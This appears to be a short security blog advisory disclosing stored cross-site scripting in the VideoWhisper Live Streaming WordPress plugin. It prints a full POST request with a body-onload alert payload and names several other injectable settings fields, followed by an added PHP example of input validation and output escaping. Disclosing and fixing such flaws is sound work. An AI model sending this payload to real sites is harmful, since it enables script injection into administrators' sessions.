Wednesday 26 February 2014

[EN] XSS in VideoWhisper Live Streaming

# ==============================================================
# Title ...| XSS in VideoWhisper Live Streaming
# Version .| 4.29.6
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=premium HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 310

premiumList='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&canWatchPremium=all&watchListPremium=Super+Admin%2C+Administrator%2C+Editor%2C+Author%2C+Contributor%2C+Subscriber&pLogo=1&transcoding=1&alwaysRTMP=0&pBroadcastTime=0&pWatchTime=0&timeReset=30&pCamBandwidth=65536&pCamMaxBandwidth=163840&submit=Save+Changes
---<request>---

Also vulnerable: watchListPremium, pBroadcastTime, timeReset, pCamBandwidth
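
Added example, not the plugin's code and not part of the original post: how a settings handler can close this class of bug by validating numeric fields on input and HTML-escaping every stored value on output. The function names and the field types are assumptions; the field names are taken from the request above. Inside WordPress, absint() and esc_attr() fill the same roles.

```php
<?php
// Added example: hypothetical settings handler, not the plugin's code.
// Field names come from the request above; their types are assumed.
const INT_FIELDS  = ['pBroadcastTime', 'pWatchTime', 'timeReset',
                     'pCamBandwidth', 'pCamMaxBandwidth'];
const TEXT_FIELDS = ['premiumList', 'watchListPremium'];

// Input side: numeric settings must be digits only; anything else is
// replaced by 0, so markup never reaches the options table.
function clean_settings(array $post): array
{
    $clean = [];
    foreach (INT_FIELDS as $name) {
        $raw = $post[$name] ?? '';
        $clean[$name] = (is_string($raw) && ctype_digit($raw)) ? (int)$raw : 0;
    }
    foreach (TEXT_FIELDS as $name) {
        $raw = $post[$name] ?? '';
        // Free-text lists are kept as sent; they are made safe at output.
        $clean[$name] = is_string($raw) ? trim($raw) : '';
    }
    return $clean;
}

// Output side: escape for an HTML attribute, including both quote styles,
// because the payload above leads with both ' and ".
function render_field(string $name, $value): string
{
    $esc = fn($s) => htmlspecialchars((string)$s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $esc($name) . '" value="' . $esc($value) . '">';
}

// Constructed sample: premiumList is the value from the request above;
// the timeReset value is made up to show a numeric field carrying markup.
$body = 'premiumList=\'%3e"%3e%3cbody%2fonload%3dalert(9999)%3e'
      . '&timeReset=30%22%3e%3cb%3e&pCamBandwidth=65536';
parse_str($body, $post);

foreach (clean_settings($post) as $name => $value) {
    echo render_field($name, $value), PHP_EOL;
}
```
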


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
